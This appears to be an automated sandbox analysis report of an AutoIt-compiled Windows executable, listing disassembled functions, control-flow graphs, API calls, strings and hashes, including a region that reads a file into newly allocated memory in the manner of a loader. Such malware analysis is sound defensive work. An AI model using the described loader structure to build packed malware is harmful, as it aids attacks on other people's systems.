                                                              control_flow_graph 961 ab3742-ab3762 963 ab37c2-ab37c4 961->963 964 ab3764-ab3767 961->964 963->964 965 ab37c6 963->965 966 ab3769-ab3770 964->966 967 ab37c8 964->967 968 ab37ab-ab37b3 DefWindowProcW 965->968 971 ab382c-ab3834 PostQuitMessage 966->971 972 ab3776-ab377b 966->972 969 b21e00-b21e2e call ab2ff6 call ace312 967->969 970 ab37ce-ab37d1 967->970 979 ab37b9-ab37bf 968->979 1008 b21e33-b21e3a 969->1008 973 ab37d3-ab37d4 970->973 974 ab37f6-ab381d SetTimer RegisterWindowMessageW 970->974 978 ab37f2-ab37f4 971->978 976 b21e88-b21e9c call af4ddd 972->976 977 ab3781-ab3783 972->977 980 b21da3-b21da6 973->980 981 ab37da-ab37ed KillTimer call ab3847 call ab390f 973->981 974->978 983 ab381f-ab382a CreatePopupMenu 974->983 976->978 1002 b21ea2 976->1002 984 ab3789-ab378e 977->984 985 ab3836-ab3840 call aceb83 977->985 978->979 987 b21da8-b21daa 980->987 988 b21ddc-b21dfb MoveWindow 980->988 981->978 983->978 991 b21e6d-b21e74 984->991 992 ab3794-ab3799 984->992 1003 ab3845 985->1003 995 b21dcb-b21dd7 SetFocus 987->995 996 b21dac-b21daf 987->996 988->978 991->968 998 b21e7a-b21e83 call aea5f3 991->998 1000 ab379f-ab37a5 992->1000 1001 b21e58-b21e68 call af55bd 992->1001 995->978 996->1000 1004 b21db5-b21dc6 call ab2ff6 996->1004 998->968 1000->968 1000->1008 1001->978 1002->968 1003->978 1004->978 1008->968 1012 b21e40-b21e53 call ab3847 call ab4ffc 1008->1012 1012->968
                                                              APIs
                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00AB37B3
                                                              • KillTimer.USER32(?,00000001), ref: 00AB37DD
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AB3800
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AB380B
                                                              • CreatePopupMenu.USER32 ref: 00AB381F
                                                              • PostQuitMessage.USER32(00000000), ref: 00AB382E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                              • String ID: TaskbarCreated
                                                              • API String ID: 129472671-2362178303
                                                              • Opcode ID: 7a3ad9b4207679efcfc22eaf732ab55203fb0e7f668c99dc488f5e13792b58e9
                                                              • Instruction ID: 7fca991e7764a3569daae783b3403e3597612da2484aa3fd67e9d5a86eac692d
                                                              • Opcode Fuzzy Hash: 7a3ad9b4207679efcfc22eaf732ab55203fb0e7f668c99dc488f5e13792b58e9
                                                              • Instruction Fuzzy Hash: CB41D3F7104195ABDF14EB6CAD4ABFE36ADF714300F104929F51A93192CE609ED09772
                                                              Function 00AB3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00AB3E79
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00AB3E88
                                                              • LoadIconW.USER32(00000063), ref: 00AB3E9E
                                                              • LoadIconW.USER32(000000A4), ref: 00AB3EB0
                                                              • LoadIconW.USER32(000000A2), ref: 00AB3EC2
                                                                • Part of subcall function 00AB4024: LoadImageW.USER32(00AB0000,00000063,00000001,00000010,00000010,00000000), ref: 00AB4048
                                                              • RegisterClassExW.USER32(?), ref: 00AB3F30
                                                                • Part of subcall function 00AB3F53: GetSysColorBrush.USER32(0000000F), ref: 00AB3F86
                                                                • Part of subcall function 00AB3F53: RegisterClassExW.USER32(00000030), ref: 00AB3FB0
                                                                • Part of subcall function 00AB3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AB3FC1
                                                                • Part of subcall function 00AB3F53: InitCommonControlsEx.COMCTL32(?), ref: 00AB3FDE
                                                                • Part of subcall function 00AB3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AB3FEE
                                                                • Part of subcall function 00AB3F53: LoadIconW.USER32(000000A9), ref: 00AB4004
                                                                • Part of subcall function 00AB3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AB4013
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                              • String ID: #$0$AutoIt v3
                                                              • API String ID: 423443420-4155596026
                                                              • Opcode ID: 16f045419800e02ce20c5217503c9a343a7a313aa9a125598c584b38eb44405a
                                                              • Instruction ID: 6016470ec36c591ee4e52a1e0cffb1066600b52afe8eeb6f713d7b30a269e5e6
                                                              • Opcode Fuzzy Hash: 16f045419800e02ce20c5217503c9a343a7a313aa9a125598c584b38eb44405a
                                                              • Instruction Fuzzy Hash: 332132B1D00304ABCB10DFADEC46A9DBFF5FB48310F50852AE218A72A1DB754680DFA1
                                                              Function 00ADACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1025 adacb3-adace0 call ad6ac0 call ad7cf4 call ad6986 1032 adacfd-adad02 1025->1032 1033 adace2-adacf8 call ade880 1025->1033 1035 adad08-adad0f 1032->1035 1041 adaf52-adaf57 call ad6b05 1033->1041 1037 adad11-adad40 1035->1037 1038 adad42-adad51 GetStartupInfoW 1035->1038 1037->1035 1039 adad57-adad5c 1038->1039 1040 adae80-adae86 1038->1040 1039->1040 1042 adad62-adad79 1039->1042 1043 adae8c-adae9d 1040->1043 1044 adaf44-adaf50 call adaf58 1040->1044 1047 adad7b-adad7d 1042->1047 1048 adad80-adad83 1042->1048 1049 adae9f-adaea2 1043->1049 1050 adaeb2-adaeb8 1043->1050 1044->1041 1047->1048 1052 adad86-adad8c 1048->1052 1049->1050 1053 adaea4-adaead 1049->1053 1054 adaebf-adaec6 1050->1054 1055 adaeba-adaebd 1050->1055 1057 adadae-adadb6 1052->1057 1058 adad8e-adad9f call ad6986 1052->1058 1059 adaf3e-adaf3f 1053->1059 1060 adaec9-adaed5 GetStdHandle 1054->1060 1055->1060 1064 adadb9-adadbb 1057->1064 1070 adada5-adadab 1058->1070 1071 adae33-adae3a 1058->1071 1059->1040 1061 adaf1c-adaf32 1060->1061 1062 adaed7-adaed9 1060->1062 1061->1059 1067 adaf34-adaf37 1061->1067 1062->1061 1065 adaedb-adaee4 GetFileType 1062->1065 1064->1040 1068 adadc1-adadc6 1064->1068 1065->1061 1069 adaee6-adaef0 1065->1069 1067->1059 1072 adadc8-adadcb 1068->1072 1073 adae20-adae31 1068->1073 1074 adaefa-adaefd 1069->1074 1075 adaef2-adaef8 1069->1075 1070->1057 1076 adae40-adae4e 1071->1076 1072->1073 1077 adadcd-adadd1 1072->1077 1073->1064 1079 adaeff-adaf03 1074->1079 1080 adaf08-adaf1a InitializeCriticalSectionAndSpinCount 1074->1080 1078 adaf05 1075->1078 1081 adae74-adae7b 1076->1081 1082 adae50-adae72 1076->1082 1077->1073 1083 adadd3-adadd5 1077->1083 1078->1080 1079->1078 1080->1059 1081->1052 1082->1076 1084 adade5-adae1a InitializeCriticalSectionAndSpinCount 1083->1084 1085 adadd7-adade3 GetFileType 1083->1085 1086 adae1d 1084->1086 1085->1084 1085->1086 1086->1073
                                                              APIs
                                                              • __lock.LIBCMT ref: 00ADACC1
                                                                • Part of subcall function 00AD7CF4: __mtinitlocknum.LIBCMT ref: 00AD7D06
                                                                • Part of subcall function 00AD7CF4: EnterCriticalSection.KERNEL32(00000000,?,00AD7ADD,0000000D), ref: 00AD7D1F
                                                              • __calloc_crt.LIBCMT ref: 00ADACD2
                                                                • Part of subcall function 00AD6986: __calloc_impl.LIBCMT ref: 00AD6995
                                                                • Part of subcall function 00AD6986: Sleep.KERNEL32(00000000,000003BC,00ACF507,?,0000000E), ref: 00AD69AC
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00ADACED
                                                              • GetStartupInfoW.KERNEL32(?,00B66E28,00000064,00AD5E91,00B66C70,00000014), ref: 00ADAD46
                                                              • __calloc_crt.LIBCMT ref: 00ADAD91
                                                              • GetFileType.KERNEL32(00000001), ref: 00ADADD8
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00ADAE11
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                              • String ID:
                                                              • API String ID: 1426640281-0
                                                              • Opcode ID: 7f82a5cc5e30adf48efcb97270ca5b74c7af19b1fb268ee95e5c9c7ce4fd59e7
                                                              • Instruction ID: 546e0d4a31b50955c635af97251b2ab5f2a01cb9e8019fa06f984d81628be3c3
                                                              • Opcode Fuzzy Hash: 7f82a5cc5e30adf48efcb97270ca5b74c7af19b1fb268ee95e5c9c7ce4fd59e7
                                                              • Instruction Fuzzy Hash: 4E81D3719053558FDB14CF68C8806ADBBF0AF59324B24425FE4ABAB3D1DB349843CB56
                                                              Function 00E877C0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1087 e877c0-e8786e call e851f0 1090 e87875-e8789b call e886d0 CreateFileW 1087->1090 1093 e8789d 1090->1093 1094 e878a2-e878b2 1090->1094 1095 e879ed-e879f1 1093->1095 1101 e878b9-e878d3 VirtualAlloc 1094->1101 1102 e878b4 1094->1102 1096 e87a33-e87a36 1095->1096 1097 e879f3-e879f7 1095->1097 1103 e87a39-e87a40 1096->1103 1099 e879f9-e879fc 1097->1099 1100 e87a03-e87a07 1097->1100 1099->1100 1104 e87a09-e87a13 1100->1104 1105 e87a17-e87a1b 1100->1105 1106 e878da-e878f1 ReadFile 1101->1106 1107 e878d5 1101->1107 1102->1095 1108 e87a42-e87a4d 1103->1108 1109 e87a95-e87aaa 1103->1109 1104->1105 1114 e87a2b 1105->1114 1115 e87a1d-e87a27 1105->1115 1116 e878f8-e87938 VirtualAlloc 1106->1116 1117 e878f3 1106->1117 1107->1095 1110 e87a4f 1108->1110 1111 e87a51-e87a5d 1108->1111 1112 e87aba-e87ac2 1109->1112 1113 e87aac-e87ab7 VirtualFree 1109->1113 1110->1109 1118 e87a5f-e87a6f 1111->1118 1119 e87a71-e87a7d 1111->1119 1113->1112 1114->1096 1115->1114 1120 e8793a 1116->1120 1121 e8793f-e8795a call e88920 1116->1121 1117->1095 1123 e87a93 1118->1123 1124 e87a8a-e87a90 1119->1124 1125 e87a7f-e87a88 1119->1125 1120->1095 1127 e87965-e8796f 1121->1127 1123->1103 1124->1123 1125->1123 1128 e87971-e879a0 call e88920 1127->1128 1129 e879a2-e879b6 call e88730 1127->1129 1128->1127 1135 e879b8 1129->1135 1136 e879ba-e879be 1129->1136 1135->1095 1137 e879ca-e879ce 1136->1137 1138 e879c0-e879c4 CloseHandle 1136->1138 1139 e879de-e879e7 1137->1139 1140 e879d0-e879db VirtualFree 1137->1140 1138->1137 1139->1090 1139->1095 1140->1139
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E87891
                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E87AB7
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303683207.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e85000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CreateFileFreeVirtual
                                                              • String ID:
                                                              • API String ID: 204039940-0
                                                              • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                              • Instruction ID: b5aa5c045dda2278d3493f3411ada355ae047d90482ed0ab753ff1bff547d14b
                                                              • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                              • Instruction Fuzzy Hash: 54A14870E04209EBDB18DFA4C895BEEBBB5FF48304F209199E559BB280D7759E40CB90
                                                              Function 00AB49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1196 ab49fb-ab4a25 call abbcce RegOpenKeyExW 1199 ab4a2b-ab4a2f 1196->1199 1200 b241cc-b241e3 RegQueryValueExW 1196->1200 1201 b24246-b2424f RegCloseKey 1200->1201 1202 b241e5-b24222 call acf4ea call ab47b7 RegQueryValueExW 1200->1202 1207 b24224-b2423b call ab6a63 1202->1207 1208 b2423d-b24245 call ab47e2 1202->1208 1207->1208 1208->1201
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00AB4A1D
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B241DB
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B2421A
                                                              • RegCloseKey.ADVAPI32(?), ref: 00B24249
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$CloseOpen
                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                              • API String ID: 1586453840-614718249
                                                              • Opcode ID: a34a95cb74371d3028e9abed7bfa82f057548f8e47cf32e7e47dc035b476ea49
                                                              • Instruction ID: e0ca5d24b48a78e3d5383ef7175089dfa8289b9daa44f6bc26cc7b8cc3c8d8ad
                                                              • Opcode Fuzzy Hash: a34a95cb74371d3028e9abed7bfa82f057548f8e47cf32e7e47dc035b476ea49
                                                              • Instruction Fuzzy Hash: BC113D71600119BEEB04ABA4DE96DEF7BBCEF09744F100059B506E71A2EB709E41D750
                                                              Function 00AB36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1223 ab36b8-ab3728 CreateWindowExW * 2 ShowWindow * 2
                                                              APIs
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AB36E6
                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AB3707
                                                              • ShowWindow.USER32(00000000,?,?,?,?,00AB3AA3,?), ref: 00AB371B
                                                              • ShowWindow.USER32(00000000,?,?,?,?,00AB3AA3,?), ref: 00AB3724
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$CreateShow
                                                              • String ID: AutoIt v3$edit
                                                              • API String ID: 1584632944-3779509399
                                                              • Opcode ID: a3f2a68ef27a6cd8645bde276619b1ea377f8eadc77bd53097689eb37167217f
                                                              • Instruction ID: 3b791704ee0e9e5096a6ce0c3a0c8c1059496590c7fc3dca6789e7da66378d6c
                                                              • Opcode Fuzzy Hash: a3f2a68ef27a6cd8645bde276619b1ea377f8eadc77bd53097689eb37167217f
                                                              • Instruction Fuzzy Hash: C8F0DA715402D07EE731A76FAC09E672E7ED7C6F20B10441EFA08A31B0C96108D5DAB1
                                                              Function 00E875A0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1328 e875a0-e876bf call e851f0 call e87490 CreateFileW 1335 e876c1 1328->1335 1336 e876c6-e876d6 1328->1336 1337 e87776-e8777b 1335->1337 1339 e876d8 1336->1339 1340 e876dd-e876f7 VirtualAlloc 1336->1340 1339->1337 1341 e876f9 1340->1341 1342 e876fb-e87712 ReadFile 1340->1342 1341->1337 1343 e87714 1342->1343 1344 e87716-e87750 call e874d0 call e86490 1342->1344 1343->1337 1349 e8776c-e87774 ExitProcess 1344->1349 1350 e87752-e87767 call e87520 1344->1350 1349->1337 1350->1349
                                                              APIs
                                                                • Part of subcall function 00E87490: Sleep.KERNELBASE(000001F4), ref: 00E874A1
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E876B5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303683207.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e85000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CreateFileSleep
                                                              • String ID: 7DLHXTXZ41SP5
                                                              • API String ID: 2694422964-740947721
                                                              • Opcode ID: d34266b5ce95a147d9bc49f2219d51109f91a2eccba2cec2acc160d98106224f
                                                              • Instruction ID: 6aca7c09bab477e248d3992275cbf6abc320d14600b1d9bf3523d5343340ffdc
                                                              • Opcode Fuzzy Hash: d34266b5ce95a147d9bc49f2219d51109f91a2eccba2cec2acc160d98106224f
                                                              • Instruction Fuzzy Hash: 3F518131D08249DBEF11EBA4C814BEEBB79AF09304F104199E65CBB2C0D7795B49CBA5
                                                              Function 00AB51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AB522F
                                                              • _wcscpy.LIBCMT ref: 00AB5283
                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AB5293
                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B23CB0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                              • String ID: Line:
                                                              • API String ID: 1053898822-1585850449
                                                              • Opcode ID: 3a6043a30c2a12e48bef8069a68744ef8208e17005f933bf6d278d55d5ba9bc8
                                                              • Instruction ID: 9ea62c0a944decdb6e7582a68b0fa9ddf31caf8e27619fe4e89851c591c4ba93
                                                              • Opcode Fuzzy Hash: 3a6043a30c2a12e48bef8069a68744ef8208e17005f933bf6d278d55d5ba9bc8
                                                              • Instruction Fuzzy Hash: BA31B0718083406ED325EB68ED42FDE77ECEB44310F00491EF58993192DB74A688CB92
                                                              Function 00AB4139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AB41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00AB39FE,?,00000001), ref: 00AB41DB
                                                              • _free.LIBCMT ref: 00B236B7
                                                              • _free.LIBCMT ref: 00B236FE
                                                                • Part of subcall function 00ABC833: __wsplitpath.LIBCMT ref: 00ABC93E
                                                                • Part of subcall function 00ABC833: _wcscpy.LIBCMT ref: 00ABC953
                                                                • Part of subcall function 00ABC833: _wcscat.LIBCMT ref: 00ABC968
                                                                • Part of subcall function 00ABC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00ABC978
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                              • API String ID: 805182592-1757145024
                                                              • Opcode ID: 5211f5383ba14aef6b6c4713987ab420507c101eb4311accad0a063e7ef9b7a7
                                                              • Instruction ID: e32c44fe779e33590a19634d576d4806b9678969f7e111a63eb052c52ff3c173
                                                              • Opcode Fuzzy Hash: 5211f5383ba14aef6b6c4713987ab420507c101eb4311accad0a063e7ef9b7a7
                                                              • Instruction Fuzzy Hash: 4D91A471910229AFCF05EFA4DD919EEB7F8FF18710F004469F41AAB292DB389A05CB50
                                                              Function 00AB4A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AB5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B71148,?,00AB61FF,?,00000000,00000001,00000000), ref: 00AB5392
                                                                • Part of subcall function 00AB49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00AB4A1D
                                                              • _wcscat.LIBCMT ref: 00B22D80
                                                              • _wcscat.LIBCMT ref: 00B22DB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$FileModuleNameOpen
                                                              • String ID: \$\Include\
                                                              • API String ID: 3592542968-2640467822
                                                              • Opcode ID: 2a61944c34c4d012752a54a3602f2e245cba128931e9d36185246795e911b1c0
                                                              • Instruction ID: a465d590e5fb66be300d5af2cbb54fdbb5be4623a39acc9acd392fa9b2714aa4
                                                              • Opcode Fuzzy Hash: 2a61944c34c4d012752a54a3602f2e245cba128931e9d36185246795e911b1c0
                                                              • Instruction Fuzzy Hash: 835161764043409BC714EF69EA8189AB7F8FE59310F80497EF64DA3662EF309684CB52
                                                              Function 00AD34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __getstream.LIBCMT ref: 00AD34FE
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00AD3539
                                                              • __wopenfile.LIBCMT ref: 00AD3549
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                              • String ID: <G
                                                              • API String ID: 1820251861-2138716496
                                                              • Opcode ID: 5964d8d9de08528fd8ea18ab87577e08ff833140e6bae490be804a320b1da93b
                                                              • Instruction ID: 8e1fb441fddd2af5570945d2e9634b83aa23c4e32c71315306b7866119994b48
                                                              • Opcode Fuzzy Hash: 5964d8d9de08528fd8ea18ab87577e08ff833140e6bae490be804a320b1da93b
                                                              • Instruction Fuzzy Hash: 30110AB2A002069FDF11BF719D4267E36B4AF05790B148527E417DB381EB38CA0197A2
